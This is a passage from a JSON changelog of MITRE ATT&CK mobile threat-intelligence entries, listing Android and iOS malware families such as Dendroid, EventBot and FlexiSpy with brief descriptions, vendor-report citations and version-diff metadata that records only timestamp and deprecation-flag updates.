"https://attack.mitre.org/software/S0323", + "external_id": "S0323" + }, + { + "source_name": "Charger", + "description": "(Citation: CheckPoint-Charger)" + }, + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. 
Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Charger" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:41.299000+00:00\", \"old_value\": \"2025-04-16 21:22:14.258000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-26 15:33:55.798000+00:00", + "modified": "2025-04-25 14:40:38.438000+00:00", + "name": "Circles", + "description": "[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company\u2019s infrastructure or purchased as a cloud service. Circles has reportedly been linked to the NSO Group.(Citation: CitizenLab Circles)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0602", + "external_id": "S0602" + }, + { + "source_name": "CitizenLab Circles", + "description": "Bill Marczak, John Scott-Railton, Siddharth Prakash Rao, Siena Anstis, and Ron Deibert. (2020, December 1). Running in Circles Uncovering the Clients of Cyberespionage Firm Circles. 
Retrieved December 23, 2020.", + "url": "https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Circles" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:38.438000+00:00\", \"old_value\": \"2025-04-16 21:22:13.137000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-04-24 15:12:10.817000+00:00", + "modified": "2025-04-25 14:40:31.516000+00:00", + "name": "Concipit1248", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0426", + "external_id": "S0426" + }, + { + "source_name": "Corona Updates", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. 
Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Concipit1248", + "Corona Updates" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:31.516000+00:00\", \"old_value\": \"2025-04-16 21:22:10.526000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-04-24 15:06:32.870000+00:00", + "modified": "2025-04-25 14:40:23.129000+00:00", + "name": "Corona Updates", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store.(Citation: TrendMicro Coronavirus Updates)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0425", + "external_id": "S0425" + }, + { + "source_name": "Wabi Music", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "Concipit1248", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. 
(2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Corona Updates", + "Wabi Music", + "Concipit1248" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:23.129000+00:00\", \"old_value\": \"2025-04-16 21:22:07.148000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-26 15:12:39.648000+00:00", + "modified": "2025-04-25 14:40:27.329000+00:00", + "name": "DEFENSOR ID", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim\u2019s bank account or cryptocurrency wallet and taking over email or social media accounts. [DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android\u2019s accessibility service.(Citation: ESET DEFENSOR ID) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0479", + "external_id": "S0479" + }, + { + "source_name": "ESET DEFENSOR ID", + "description": "L. Stefanko. (2020, May 22). 
Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020.", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DEFENSOR ID" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Luk\u00e1\u0161 \u0160tefanko, ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:27.329000+00:00\", \"old_value\": \"2025-04-16 21:22:08.935000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:37.438000+00:00", + "modified": "2025-04-25 14:40:21.321000+00:00", + "name": "Dendroid", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0301", + "external_id": "S0301" + }, + { + "source_name": "Dendroid", + "description": "(Citation: Lookout-Dendroid)" + }, + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). 
Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Dendroid" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:21.321000+00:00\", \"old_value\": \"2025-04-16 21:22:06.526000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-24 21:50:02.027000+00:00", + "modified": "2025-04-25 14:40:24.588000+00:00", + "name": "DoubleAgent", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0550", + "external_id": "S0550" + }, + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DoubleAgent" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:24.588000+00:00\", \"old_value\": \"2025-04-16 21:22:07.802000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:37.856000+00:00", + "modified": "2025-04-25 14:40:47.460000+00:00", + "name": "DressCode", + "description": "[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. (Citation: TrendMicro-DressCode)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0300", + "external_id": "S0300" + }, + { + "source_name": "DressCode", + "description": "(Citation: TrendMicro-DressCode)" + }, + { + "source_name": "TrendMicro-DressCode", + "description": "Echo Duan. (2016, September 29). DressCode and its Potential Impact for Enterprises. 
Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:47.460000+00:00\", \"old_value\": \"2025-04-16 21:22:16.646000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:41.721000+00:00", + "modified": "2025-04-25 14:40:26.050000+00:00", + "name": "DualToy", + "description": "[DualToy](https://attack.mitre.org/software/S0315) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0315", + "external_id": "S0315" + }, + { + "source_name": "DualToy", + "description": "(Citation: PaloAlto-DualToy)" + }, + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. (2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. 
Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:26.050000+00:00\", \"old_value\": \"2025-04-16 21:22:08.432000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-12-10 16:07:40.664000+00:00", + "modified": "2025-04-25 14:40:18.436000+00:00", + "name": "Dvmap", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. It is credited with being the first malware that performs this type of code injection.(Citation: SecureList DVMap June 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0420", + "external_id": "S0420" + }, + { + "source_name": "SecureList DVMap June 2017", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. 
Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Dvmap" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:18.436000+00:00\", \"old_value\": \"2025-04-16 21:22:05.219000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-26 14:55:12.847000+00:00", + "modified": "2025-04-25 14:40:36.402000+00:00", + "name": "EventBot", + "description": "[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android\u2019s accessibility service to steal data from various applications.(Citation: Cybereason EventBot) [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.(Citation: Cybereason EventBot)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0478", + "external_id": "S0478" + }, + { + "source_name": "Cybereason EventBot", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. 
Retrieved June 26, 2020.", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "EventBot" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:36.402000+00:00\", \"old_value\": \"2025-04-16 21:22:12.346000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-15 15:18:11.971000+00:00", + "modified": "2025-04-25 14:40:30.790000+00:00", + "name": "FakeSpy", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0509", + "external_id": "S0509" + }, + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. 
Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FakeSpy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ofir Almkias, Cybereason" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:30.790000+00:00\", \"old_value\": \"2025-04-16 21:22:10.213000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-04 15:38:56.070000+00:00", + "modified": "2025-04-25 14:40:48.201000+00:00", + "name": "FlexiSpy", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)\n\n[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0408", + "external_id": "S0408" + }, + { + "source_name": "FortiGuard-FlexiSpy", + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. 
Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf" + }, + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + }, + { + "source_name": "FlexiSpy-Website", + "description": "FlexiSpy. (n.d.). FlexiSpy. Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "FlexiSpy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:48.201000+00:00\", \"old_value\": \"2025-04-16 21:22:17.243000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-24 17:55:12.561000+00:00", + "modified": "2025-04-25 14:40:36.033000+00:00", + "name": "GPlayed", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) is an Android trojan with a broad range of capabilities.(Citation: Talos GPlayed) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0536", + "external_id": "S0536" + }, + { + "source_name": "Talos GPlayed", + "description": "V. 
Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GPlayed" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:36.033000+00:00\", \"old_value\": \"2025-04-16 21:22:12.191000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-04-08 15:51:24.862000+00:00", + "modified": "2025-04-25 14:40:28.434000+00:00", + "name": "Ginp", + "description": "[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422).(Citation: ThreatFabric Ginp)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0423", + "external_id": "S0423" + }, + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. 
Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ginp" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:28.434000+00:00\", \"old_value\": \"2025-04-16 21:22:09.244000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-20 15:44:57.339000+00:00", + "modified": "2025-04-25 14:40:44.740000+00:00", + "name": "Golden Cup", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans.(Citation: Symantec GoldenCup) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0535", + "external_id": "S0535" + }, + { + "source_name": "Symantec GoldenCup", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. 
Retrieved October 29, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Golden Cup" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:44.740000+00:00\", \"old_value\": \"2025-04-16 21:22:15.703000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-24 22:04:27.667000+00:00", + "modified": "2025-04-25 14:40:15.155000+00:00", + "name": "GoldenEagle", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0551", + "external_id": "S0551" + }, + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "GoldenEagle" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:15.155000+00:00\", \"old_value\": \"2025-04-16 21:22:03.977000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-27 17:05:57.712000+00:00", 